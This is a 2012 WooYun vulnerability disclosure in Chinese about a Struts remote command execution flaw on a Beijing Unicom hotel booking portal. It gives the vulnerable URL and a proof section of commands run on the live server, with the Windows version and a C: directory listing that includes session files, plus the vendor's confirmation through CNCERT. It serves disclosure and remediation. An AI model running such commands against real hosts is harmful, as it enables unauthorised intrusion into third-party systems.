当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-012039

漏洞标题:北京联通某站点的命令执行

相关厂商:北京联通

漏洞作者: NoArgs

提交时间:2012-09-11 16:00

修复时间:2012-10-26 16:01

公开时间:2012-10-26 16:01

漏洞类型:系统/服务补丁不及时

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-09-11: 细节已通知厂商并且等待厂商处理中
2012-09-15: 厂商已经确认,细节仅向厂商公开
2012-09-25: 细节向核心白帽子及相关领域专家公开
2012-10-05: 细节向普通白帽子公开
2012-10-15: 细节向实习白帽子公开
2012-10-26: 细节向公众公开

简要描述:

再次提交struts漏洞。

详细说明:

北京联通114门户网站
首页网址:http://www.114menhu.com/Unicom114/index.html
存在漏洞URL:http://hotel.114menhu.com/HBE/Hotel/WebHotelEntranceAction.action

漏洞证明:

>url http://hotel.114menhu.com/HBE/Hotel/WebHotelEntranceAction.action
Set URL:http://hotel.114menhu.com/HBE/Hotel/WebHotelEntranceAction.action
>cmd /r ver
Microsoft Windows [?? 5.2.3790]
>cmd /r dir c:\
??? C ???? sun
?????? 28D4-9971
c:\ ???
2012-09-07 14:17 <DIR> apache-tomcat-6.0.18
2011-07-26 13:17 0 AUTOEXEC.BAT
2012-02-10 17:52 218 cgisess_01ab2ed82b507f15a5e3bdeac9cd45ad
2012-02-10 17:51 218 cgisess_19fb627f5006a5465f731ef1bfa7df10
2012-02-10 17:51 218 cgisess_26527457fd5b2ba23d50db92f224f1ea
2012-02-10 17:49 218 cgisess_4c5076c9ce06fa760d15e54029d29f0c
2012-02-10 17:50 218 cgisess_56b4641b13dab9a6cc128a758c982814
2012-02-10 17:51 218 cgisess_cfb56aa16249aec2d632181ed871e6c7
2012-02-10 17:49 218 cgisess_d925b649f848dc6f7a2b74a838c98bc0
2012-02-10 17:51 218 cgisess_fd49461d0698b19fb3e286ee43652496
2011-07-26 13:17 0 CONFIG.SYS
2011-11-01 19:20 <DIR> Documents and Settings
2011-07-26 21:06 <DIR> drv
2011-10-11 12:51 4,165 hotelResponse.xml
2011-07-26 13:26 <DIR> IBMSGTK
2011-07-26 13:25 <DIR> IBM_Support
2011-07-26 13:25 <DIR> Intel
2010-03-03 12:28 <DIR> Java
2012-09-06 21:58 <DIR> jdk6
2012-04-08 22:45 <DIR> perl
2011-11-07 14:41 <DIR> Program Files
2012-09-06 23:50 797 ressearchRequest.xml
2012-09-06 23:50 129,971 ressearchResponse.xml
2011-10-11 12:50 32,516 singelResponse.xml
2012-07-06 15:24 0 SOHOTO5612DT01.jpg
2012-07-06 15:23 0 SOHOTO5612KF01.jpg
2012-07-06 15:12 0 SOHOTO5612WJ01.jpg
2012-09-11 12:08 <DIR> temp
2012-09-06 20:40 <DIR> tomcat1
2012-09-06 20:50 <DIR> tomcat2
2012-09-06 21:26 <DIR> tomcat_BJLT
2011-07-26 13:26 <DIR> UXLOG
2012-09-10 18:04 <DIR> WINDOWS
2011-07-26 13:19 <DIR> wmpub
17 ??? 169,193 ??
17 ??? 23,947,481,088 ????

修复方案:

升级Struts吧

版权声明:转载请注明来源 NoArgs@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2012-09-15 18:35

厂商回复:

CNVD确认漏洞情况,在近期的struts漏洞类型事件中批量进行处置,由CNCERT直接通报中国联通集团公司。
按通用软件漏洞进行评分,rank 6

最新状态:

暂无